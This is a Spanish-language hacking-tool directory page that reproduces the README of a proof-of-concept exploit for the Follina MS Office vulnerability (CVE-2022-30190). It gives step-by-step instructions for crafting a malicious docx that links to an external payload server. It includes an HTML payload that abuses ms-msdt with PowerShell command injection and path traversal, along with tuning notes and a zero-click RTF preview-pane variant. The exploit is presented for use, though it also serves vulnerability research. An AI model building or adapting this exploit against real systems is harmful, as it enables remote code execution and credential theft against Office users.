Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
PoC-CVE-2022-30190 — PoC CVE-2022-30190 : vulnerabilidad 0-day de MS Office RCE, también conocida como msdt follina | Kitploit
Herramientas/GitHubGitHub/jmousqueton/poc-cve-2022-30190
Herramientas de PhishingGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónMovimiento LateralExplotación de Aplicaciones WebComando y Control
GitHubjmousqueton/poc-cve-2022-30190

PoC-CVE-2022-30190

PoC CVE-2022-30190 : vulnerabilidad 0-day de MS Office RCE, también conocida como msdt follina

Ver Repositorio
15752hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

POC CVE-2022-30190 : CVE 0-day MS Offic RCE, también conocido como msdt follina

Información : Nueva vulnerabilidad de día cero de Microsoft Office utilizada en ataques para ejecutar PowerShell

Resumen

El 29 de mayo de 2022, el equipo Nao_Sec, un equipo independiente de investigación en ciberseguridad, descubrió un documento malicioso de Office compartido en Virustotal. Este documento utiliza un esquema inusual pero conocido para infectar a sus víctimas. El esquema no fue detectado como malicioso por algunos EDR, como Microsoft Defender for Endpoint. Esta vulnerabilidad podría conducir a la ejecución de código sin necesidad de interacción del usuario, ya que no involucra macros, excepto si el modo de Vista protegida está habilitado. Todavía no se ha atribuido ningún número de CVE.

Detalles técnicos

La vulnerabilidad está siendo explotada mediante el uso del esquema de URI de MSProtocol para cargar código. Los atacantes podrían incrustar enlaces maliciosos dentro de documentos, plantillas o correos electrónicos de Microsoft Office que comiencen con ms-msdt: y que se cargarán y ejecutarán posteriormente sin interacción del usuario

  • excepto si el modo de Vista protegida está habilitado. No obstante, convertir el documento al formato RTF también podría omitir la función de Vista protegida.

Prueba de concepto

Los archivos docx de MS Office pueden contener referencias externas a objetos OLE como archivos HTML. Existe un esquema HTML ms-msdt: que invoca la herramienta de diagnóstico msdt, la cual es capaz de ejecutar código arbitrario (especificado en los parámetros).

El resultado es un vector de ataque aterrador para obtener RCE mediante la apertura de archivos docx maliciosos (sin usar macros).

Estos son los pasos para construir un docx de prueba de concepto:

  1. Abre Word (se usó la versión actualizada 2019 Pro, 16.0.10386.20017), crea un documento ficticio, inserta un objeto (OLE) (como imagen de mapa de bits), y guárdalo en docx.

  2. Edita word/_rels/document.xml.rels dentro de la estructura del docx (es un zip simple). Modifica la etiqueta XML <Relationship> con el atributo

root@kitploit:~
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

y cambia Target="embeddings/oleObject1.bin" cambiando el valor de Target y añadiendo el atributo TargetMode:

root@kitploit:~
Target = "http://<payload_server>/payload.html!"
TargetMode = "External"
  1. Edita word/document.xml. Busca la etiqueta <o:OLEObject ..> (con r:id="rId5") y cambia el atributo de Type="Embed" a Type="Link" y añade el atributo UpdateMode="OnCall".

NOTA: El docx malicioso creado es casi el mismo que el de CVE-2021-44444.

  1. Sirve el payload html del PoC (lanzador de calc.exe) con el esquema ms-msdt en http://<payload_server>/payload.html:
root@kitploit:~
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times
  window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>

</body>
</html>

Ten en cuenta que:

  • la línea de comentario con AAA debe repetirse >60 veces (mínimo 4096 bytes).
  • Como mínimo, se requieren dos recorridos de directorio /../ al inicio del parámetro IT_BrowseForFile
  • El código envuelto dentro de $() se ejecutaría mediante PowerShell, pero los espacios lo romperían
  • .exe debe ser la última cadena final presente al final del parámetro IT_BrowseForFile

Adicionalmente, el payload desencadenante puede conectarse a ubicaciones remotas. Aunque es poco probable que invoque un binario no confiable, la conexión aún transportará hashes NTLM (lo que significa que los actores maliciosos ahora tienen un hash de la contraseña de Windows de la víctima) que un adversario podría utilizar para una posterior post-explotación.

BONUS (versión RTF 0-click)

Si además añades estos elementos dentro del elemento <o:OLEObject> en word/document.xml en el paso 3:

root@kitploit:~
<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>

entonces también funcionará como RTF (abre el docx resultante y guárdalo como RTF).

Con RTF, no es necesario abrir el archivo en Word; basta con navegar hasta el archivo y echarle un vistazo en el panel de vista previa. El panel de vista previa activa el payload HTML externo y el RCE está ahí sin ningún clic.

Fuentes :

  • https://nao-sec.org/about
  • https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection
  • https://gist.github.com/tothi/66290a42896a97920055e50128c9f040 (código original)
  • https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
  • https://github.com/sinjap/PoC-CVE-2022-30190 (información adicional)
  • https://github.com/JohnHammond/msdt-follina (script)
Descargar herramienta